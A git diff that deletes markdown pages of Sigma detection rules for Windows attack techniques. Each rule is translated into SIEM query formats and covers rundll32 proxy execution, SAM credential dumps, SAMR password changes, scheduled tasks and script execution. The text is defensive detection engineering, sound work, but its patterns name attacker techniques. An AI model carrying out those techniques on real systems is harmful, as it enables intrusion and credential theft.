-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\rundll32.exe.* url.dll,.*OpenURL .*" -or $_.message -match "CommandLine.*.*\\rundll32.exe.* url.dll,.*OpenURLA .*" -or $_.message -match "CommandLine.*.*\\rundll32.exe.* url.dll,.*FileProtocolHandler .*" -or $_.message -match "CommandLine.*.*\\rundll32.exe.* zipfldr.dll,.*RouteTheCall .*" -or $_.message -match "CommandLine.*.*\\rundll32.exe.* Shell32.dll,.*Control_RunDLL .*" -or $_.message -match "CommandLine.*.*\\rundll32.exe javascript:.*" -or $_.message -match "CommandLine.*.* url.dll,.*OpenURL .*" -or $_.message -match "CommandLine.*.* url.dll,.*OpenURLA .*" -or $_.message -match "CommandLine.*.* url.dll,.*FileProtocolHandler .*" -or $_.message -match "CommandLine.*.* zipfldr.dll,.*RouteTheCall .*" -or $_.message -match "CommandLine.*.* Shell32.dll,.*Control_RunDLL .*" -or $_.message -match "CommandLine.*.* javascript:.*" -or $_.message -match "CommandLine.*.*.RegisterXLL.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\rundll32.exe*\ url.dll,*OpenURL\ * OR *\\rundll32.exe*\ url.dll,*OpenURLA\ * OR *\\rundll32.exe*\ url.dll,*FileProtocolHandler\ * OR *\\rundll32.exe*\ zipfldr.dll,*RouteTheCall\ * OR *\\rundll32.exe*\ Shell32.dll,*Control_RunDLL\ * OR *\\rundll32.exe\ javascript\:* OR *\ url.dll,*OpenURL\ * OR *\ url.dll,*OpenURLA\ * OR *\ url.dll,*FileProtocolHandler\ * OR *\ zipfldr.dll,*RouteTheCall\ * OR *\ Shell32.dll,*Control_RunDLL\ * OR *\ javascript\:* OR *.RegisterXLL*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e593cf51-88db-4ee1-b920-37e89012a3c9 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Rundll32 Activity",
-    "description": "Detects suspicious process related to rundll32 based on arguments",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\rundll32.exe*\\ url.dll,*OpenURL\\ * OR *\\\\rundll32.exe*\\ url.dll,*OpenURLA\\ * OR *\\\\rundll32.exe*\\ url.dll,*FileProtocolHandler\\ * OR *\\\\rundll32.exe*\\ zipfldr.dll,*RouteTheCall\\ * OR *\\\\rundll32.exe*\\ Shell32.dll,*Control_RunDLL\\ * OR *\\\\rundll32.exe\\ javascript\\:* OR *\\ url.dll,*OpenURL\\ * OR *\\ url.dll,*OpenURLA\\ * OR *\\ url.dll,*FileProtocolHandler\\ * OR *\\ zipfldr.dll,*RouteTheCall\\ * OR *\\ Shell32.dll,*Control_RunDLL\\ * OR *\\ javascript\\:* OR *.RegisterXLL*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\rundll32.exe*\\ url.dll,*OpenURL\\ * OR *\\\\rundll32.exe*\\ url.dll,*OpenURLA\\ * OR *\\\\rundll32.exe*\\ url.dll,*FileProtocolHandler\\ * OR *\\\\rundll32.exe*\\ zipfldr.dll,*RouteTheCall\\ * OR *\\\\rundll32.exe*\\ Shell32.dll,*Control_RunDLL\\ * OR *\\\\rundll32.exe\\ javascript\\:* OR *\\ url.dll,*OpenURL\\ * OR *\\ url.dll,*OpenURLA\\ * OR *\\ url.dll,*FileProtocolHandler\\ * OR *\\ zipfldr.dll,*RouteTheCall\\ * OR *\\ Shell32.dll,*Control_RunDLL\\ * OR *\\ javascript\\:* OR *.RegisterXLL*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Rundll32 Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\rundll32.exe* url.dll,*OpenURL * *\\rundll32.exe* url.dll,*OpenURLA * *\\rundll32.exe* url.dll,*FileProtocolHandler * *\\rundll32.exe* zipfldr.dll,*RouteTheCall * *\\rundll32.exe* Shell32.dll,*Control_RunDLL * *\\rundll32.exe javascript\:* * url.dll,*OpenURL * * url.dll,*OpenURLA * * url.dll,*FileProtocolHandler * * zipfldr.dll,*RouteTheCall * * Shell32.dll,*Control_RunDLL * * javascript\:* *.RegisterXLL*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\rundll32.exe* url.dll,*OpenURL *" OR CommandLine="*\\rundll32.exe* url.dll,*OpenURLA *" OR CommandLine="*\\rundll32.exe* url.dll,*FileProtocolHandler *" OR CommandLine="*\\rundll32.exe* zipfldr.dll,*RouteTheCall *" OR CommandLine="*\\rundll32.exe* Shell32.dll,*Control_RunDLL *" OR CommandLine="*\\rundll32.exe javascript:*" OR CommandLine="* url.dll,*OpenURL *" OR CommandLine="* url.dll,*OpenURLA *" OR CommandLine="* url.dll,*FileProtocolHandler *" OR CommandLine="* zipfldr.dll,*RouteTheCall *" OR CommandLine="* Shell32.dll,*Control_RunDLL *" OR CommandLine="* javascript:*" OR CommandLine="*.RegisterXLL*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\rundll32.exe* url.dll,*OpenURL *", "*\\rundll32.exe* url.dll,*OpenURLA *", "*\\rundll32.exe* url.dll,*FileProtocolHandler *", "*\\rundll32.exe* zipfldr.dll,*RouteTheCall *", "*\\rundll32.exe* Shell32.dll,*Control_RunDLL *", "*\\rundll32.exe javascript:*", "* url.dll,*OpenURL *", "* url.dll,*OpenURLA *", "* url.dll,*FileProtocolHandler *", "* zipfldr.dll,*RouteTheCall *", "* Shell32.dll,*Control_RunDLL *", "* javascript:*", "*.RegisterXLL*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\rundll32\.exe.* url\.dll,.*OpenURL .*|.*.*\rundll32\.exe.* url\.dll,.*OpenURLA .*|.*.*\rundll32\.exe.* url\.dll,.*FileProtocolHandler .*|.*.*\rundll32\.exe.* zipfldr\.dll,.*RouteTheCall .*|.*.*\rundll32\.exe.* Shell32\.dll,.*Control_RunDLL .*|.*.*\rundll32\.exe javascript:.*|.*.* url\.dll,.*OpenURL .*|.*.* url\.dll,.*OpenURLA .*|.*.* url\.dll,.*FileProtocolHandler .*|.*.* zipfldr\.dll,.*RouteTheCall .*|.*.* Shell32\.dll,.*Control_RunDLL .*|.*.* javascript:.*|.*.*\.RegisterXLL.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_by_ordinal.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_by_ordinal.md
deleted file mode 100644
index a57442a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_by_ordinal.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious Call by Ordinal       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious calls of DLLs in rundll32.dll exports by ordinal |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li><li>Windows contol panel elements have been identified as source (mmc)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/](https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/)</li><li>[https://github.com/Neo23x0/DLLRunner](https://github.com/Neo23x0/DLLRunner)</li><li>[https://twitter.com/cyb3rops/status/1186631731543236608](https://twitter.com/cyb3rops/status/1186631731543236608)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Call by Ordinal
-id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c
-description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
-status: experimental
-references:
-    - https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
-    - https://github.com/Neo23x0/DLLRunner
-    - https://twitter.com/cyb3rops/status/1186631731543236608
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1085
-    - attack.t1218.011
-author: Florian Roth
-date: 2019/10/22
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: '*\rundll32.exe *,#*'
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-    - Windows contol panel elements have been identified as source (mmc)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*\\rundll32.exe .*,#.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*\\rundll32.exe\ *,#*
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e79a9e79-eb72-4e78-a628-0e7e8f59e89c <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Call by Ordinal",
-    "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *,#*"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*\\\\rundll32.exe\\ *,#*",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Call by Ordinal'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*\\rundll32.exe *,#*
-```
-
-
-### splunk
-    
-```
-CommandLine="*\\rundll32.exe *,#*"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*\\rundll32.exe *,#*")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\rundll32\.exe .*,#.*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sam_dump.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_sam_dump.md
deleted file mode 100644
index 519d500..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sam_dump.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | SAM Dump to AppData       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration testing</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1003.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SAM Dump to AppData
-id: 839dd1e8-eda8-4834-8145-01beeee33acd
-status: experimental
-description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-author: Florian Roth
-date: 2018/01/27
-logsource:
-    product: windows
-    service: system
-    definition: The source of this type of event is Kernel-General
-detection:
-    selection:
-        EventID: 16
-        Message:
-            - '*\AppData\Local\Temp\SAM-*.dmp *'
-    condition: selection
-falsepositives:
-    - Penetration testing
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "16" -and ($_.message -match "Message.*.*\\AppData\\Local\\Temp\\SAM-.*.dmp .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"16" AND Message.keyword:(*\\AppData\\Local\\Temp\\SAM\-*.dmp\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/839dd1e8-eda8-4834-8145-01beeee33acd <<EOF
-{
-  "metadata": {
-    "title": "SAM Dump to AppData",
-    "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.002"
-    ],
-    "query": "(winlog.event_id:\"16\" AND Message.keyword:(*\\\\AppData\\\\Local\\\\Temp\\\\SAM\\-*.dmp\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"16\" AND Message.keyword:(*\\\\AppData\\\\Local\\\\Temp\\\\SAM\\-*.dmp\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SAM Dump to AppData'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"16" AND Message.keyword:(*\\AppData\\Local\\Temp\\SAM\-*.dmp *))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="16" (Message="*\\AppData\\Local\\Temp\\SAM-*.dmp *"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="16" Message IN ["*\\AppData\\Local\\Temp\\SAM-*.dmp *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*16)(?=.*(?:.*.*\AppData\Local\Temp\SAM-.*\.dmp .*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_samr_pwset.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_samr_pwset.md
deleted file mode 100644
index 81f1eca..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_samr_pwset.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Possible Remote Password Change Through SAMR       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1212: Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Dimitrios Slamaris |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Remote Password Change Through SAMR
-id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951
-description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced
-    Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
-author: Dimitrios Slamaris
-date: 2017/06/09
-tags:
-    - attack.credential_access
-    - attack.t1212
-logsource:
-    product: windows
-    service: security
-detection:
-    samrpipe:
-        EventID: 5145
-        RelativeTargetName: samr
-    passwordchanged:
-        EventID: 4738
-    passwordchanged_filter:
-        PasswordLastSet: null
-    timeframe: 15s
-    condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_samr_pwset.yml): Only COUNT aggregation function is implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_samr_pwset.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7818b381-5eb1-4641-bea5-ef9e4cfb5951 <<EOF
-{
-  "metadata": {
-    "title": "Possible Remote Password Change Through SAMR",
-    "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). \"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1212"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4738\" AND (NOT (NOT _exists_:PasswordLastSet)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "15s"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4738\" AND (NOT (NOT _exists_:PasswordLastSet)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible Remote Password Change Through SAMR'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_samr_pwset.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_samr_pwset.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_susp_samr_pwset.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4738)(?=.*(?!.*(?:.*(?=.*(?!PasswordLastSet))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_schtask_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_schtask_creation.md
deleted file mode 100644
index aa2be9c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_schtask_creation.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Scheduled Task Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of scheduled tasks in user session |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Administrative activity</li><li>Software installation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0111</li><li>car.2013-08-001</li><li>attack.t1053.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Scheduled Task Creation
-id: 92626ddd-662c-49e3-ac59-f6535f12d189
-status: experimental
-description: Detects the creation of scheduled tasks in user session
-author: Florian Roth
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\schtasks.exe'
-        CommandLine: '* /create *'
-    filter:
-        User: NT AUTHORITY\SYSTEM
-    condition: selection and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.execution
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1053
-    - attack.s0111
-    - car.2013-08-001
-    - attack.t1053.005
-falsepositives:
-    - Administrative activity
-    - Software installation
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\schtasks.exe" -and $_.message -match "CommandLine.*.* /create .*") -and  -not ($_.message -match "User.*NT AUTHORITY\\SYSTEM")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\ \/create\ *) AND (NOT (winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/92626ddd-662c-49e3-ac59-f6535f12d189 <<EOF
-{
-  "metadata": {
-    "title": "Scheduled Task Creation",
-    "description": "Detects the creation of scheduled tasks in user session",
-    "tags": [
-      "attack.execution",
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1053",
-      "attack.s0111",
-      "car.2013-08-001",
-      "attack.t1053.005"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/create\\ *) AND (NOT (winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/create\\ *) AND (NOT (winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Scheduled Task Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\schtasks.exe AND CommandLine.keyword:* \/create *) AND (NOT (User:"NT AUTHORITY\\SYSTEM")))
-```
-
-
-### splunk
-    
-```
-((Image="*\\schtasks.exe" CommandLine="* /create *") NOT (User="NT AUTHORITY\\SYSTEM")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\schtasks.exe" CommandLine="* /create *")  -(User="NT AUTHORITY\\SYSTEM"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\schtasks\.exe)(?=.*.* /create .*)))(?=.*(?!.*(?:.*(?=.*NT AUTHORITY\SYSTEM)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_script_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_script_execution.md
deleted file mode 100644
index 3c2dcfe..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_script_execution.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | WSF/JSE/JS/VBA/VBE File Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious file execution by wscript and cscript |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Michael Haag |
